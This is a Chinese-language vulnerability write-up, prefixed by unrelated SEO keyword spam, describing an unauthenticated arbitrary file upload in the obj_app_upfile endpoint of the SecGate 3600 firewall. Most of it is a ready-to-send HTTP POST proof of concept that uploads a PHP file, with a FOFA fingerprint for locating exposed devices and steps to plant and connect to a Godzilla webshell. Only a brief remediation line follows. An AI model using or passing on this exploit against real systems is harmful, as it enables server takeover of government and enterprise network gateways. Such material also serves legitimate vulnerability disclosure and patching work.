做电影电视剧网站推广,支部建设杂志官方网站,crm营销管理系统,优秀的设计网站有哪些0x01 产品简介 网神SecGate3600下一代极速防火墙#xff08;NSG系列#xff09;是基于完全自主研发、经受市场检验的成熟稳定网神第三代SecOS操作系统 并且在专业防火墙、VPN、IPS的多年产品经验积累基础上精心研发的高性能下一代防火墙 专门为运营商、政府、军队、教育、大型…0x01 产品简介 网神SecGate3600下一代极速防火墙NSG系列是基于完全自主研发、经受市场检验的成熟稳定网神第三代SecOS操作系统 并且在专业防火墙、VPN、IPS的多年产品经验积累基础上精心研发的高性能下一代防火墙 专门为运营商、政府、军队、教育、大型企业、中小型企业的互联网出口打造的集防火墙、抗DDoS攻击、VPN、内容过滤、IPS、带宽管理、用户认证等多项安全技术于一身的主动防御智能安全网关。
0x02 漏洞概述 网神 SecGate 3600 防火墙 obj_app_upfile 接口存在任意文件上传漏洞未经授权的攻击者通过漏洞可以上传任意文件获取服务器权限。
0x03 影响范围 网神 SecGate 3600 防火墙
0x04 复现环境
FOFAfid1Lh1LHi6yfkhiO83I59AYg 0x05 漏洞复现
PoC
POST /?gobj_app_upfile HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; nameMAX_FILE_SIZE10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; nameupfile; filename1.php
Content-Type: text/plain马子
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; namesubmit_postobj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name__hash__0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
上传哥斯拉马子 验证url
https://your-ip/attachements/1.php
尝试连接 0x06 修复建议
关闭互联网暴露面文件上传模块设置权限强认证。
